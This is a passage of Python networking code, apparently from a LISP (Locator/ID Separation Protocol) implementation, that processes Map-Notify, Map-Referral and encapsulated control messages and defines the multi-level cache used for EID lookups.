old_rloc_set = mc.rloc_set
mc.delete_rlocs_from_rloc_probe_list()
mc.rloc_set = []
#endif
#
# Store some data from the EID-record of the Map-Notify.
#
mc.mapping_source = None if source == "lisp-itr" else source
mc.map_cache_ttl = eid_record.store_ttl()
mc.subscribed_eid = subscribed_eid
mc.subscribed_group = subscribed_group
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(old_rloc_set) != 0 and eid_record.rloc_count == 0):
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(eid_str, False)))
continue
#endif
#
# Now add all RLOCs to a new RLOC-set. If the RLOC existed in old set,
# copy old RLOC data. We want to retain, uptimes, stats, and RLOC-
# probe data in the new entry with the same RLOC address.
#
new = replaced = 0
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
#
# See if this RLOC address is in old RLOC-set, if so, do copy.
#
found = False
for r in old_rloc_set:
if (r.rloc.is_exact_match(rloc_record.rloc)):
found = True
break
#endif
#endfor
if (found):
rloc = copy.deepcopy(r)
replaced += 1
else:
rloc = lisp_rloc()
new += 1
#endif
#
# Move data from RLOC-record of Map-Notify to RLOC entry.
#
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
mc.rloc_set.append(rloc)
#endfor
lprint("Update {} map-cache entry with {}/{} new/replaced RLOCs".\
format(green(eid_str, False), new, replaced))
#
# Build best RLOC-set and write to external data-plane, if any.
#
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
#endfor
#
# Find map-server data structure from source address of Map-Notify then
# send Map-Notify-Ack to it.
#
ms = lisp_get_map_server(source)
if (ms == None):
lprint("Cannot find Map-Server for Map-Notify source address {}".\
format(source.print_address_no_iid()))
return
#endif
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process as already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
allow, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (allow == False): continue
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
#
# Gleaned map-cache entries always override what is regitered in
# the mapping system. Since the mapping system RLE entries are RTRs
# and RTRs store gleaned mappings for group members.
#
if (mc.gleaned):
lprint("Ignore Map-Notify for gleaned {}".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False),
rloc.rle.print_rle(False, True)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
# Get map-server so we can do statistics and find auth-key, if a auth-key
# was provided in a Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
# Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify()
# starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
# in this site. There is probably a RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
#endof
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (key_id in site.auth_key):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (key in lisp_map_notify_queue):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if arrived Map-Referral EID-prefix is more-specific than the
# last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
# Process each EID record in Map-Reply message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
# Check for Map-Referral looping. If there is no loop cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (s in referral.referral_set):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
# Set dirty-bit so we can remove referral-nodes from cached entry
# that wasn't in packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (addr_str not in referral.referral_set):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (addr_str in dirty_set): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (s in referral.referral_set):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
timestamp = time.time()
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1, timestamp)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authenticaiton for Map-Register message and sent to supplied
# Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
# a Map-Server, we can't join the group by using the group so we have to
# send to the loopback address to bootstrap our membership. We join to
# one other member of the peer-group so we can get the group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use 16-byte key which is
# 32 string characters. Use 20 rounds so the decrypter can interoperate
# with ct-lisp mobile platforms.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv, 20).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send LISP control packet that is to be source from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
# For sending Map-Requests, if the NAT-traversal configured, use same
# socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associatative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries(object):
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache(object):
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (ml not in self.cache):
self.cache[ml] = lisp_cache_entries()
self.cache_sorted = self.sort_in_entry(self.cache_sorted, ml)
#endif
if (key not in self.cache[ml].entries):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (ml_key not in self.cache): return(None)
if (key not in self.cache[ml_key].entries): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry in list(self.cache[ml].entries.values()):
if (prefix.is_more_specific(entry.eid)):
if (found == None or
entry.eid.is_more_specific(found.eid)): found = entry
#endif
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (ml not in self.cache): return
if (key not in self.cache[ml].entries): return
self.cache[ml].entries.pop(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for entry in list(self.cache[ml].entries.values()):
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def sort_in_entry(self, table, value):
if (table == []): return([value])
t = table
while (True):
if (len(t) == 1):
if (value == t[0]): return(table)
index = table.index(t[0])
if (value < t[0]):
return(table[0:index] + [value] + table[index::])
#endif
if (value > t[0]):
return(table[0:index+1] + [value] + table[index+1::])
#endif
#endif
index = old_div(len(t), 2)
t = t[0:index] if (value < t[index]) else t[index::]
#endwhile
return([])
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
# more-specifics, this entry will not be retunred if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
# not find 2.2.2.2, what is retunred is 224.1.1.1/32 and not 224.0.0.0/4.
#
# So we will look at the retunred entry and if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 matches the group
# we are looking up. This, of course, is only done for longest match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a python parcularity with shifting greater than 120 bits to the
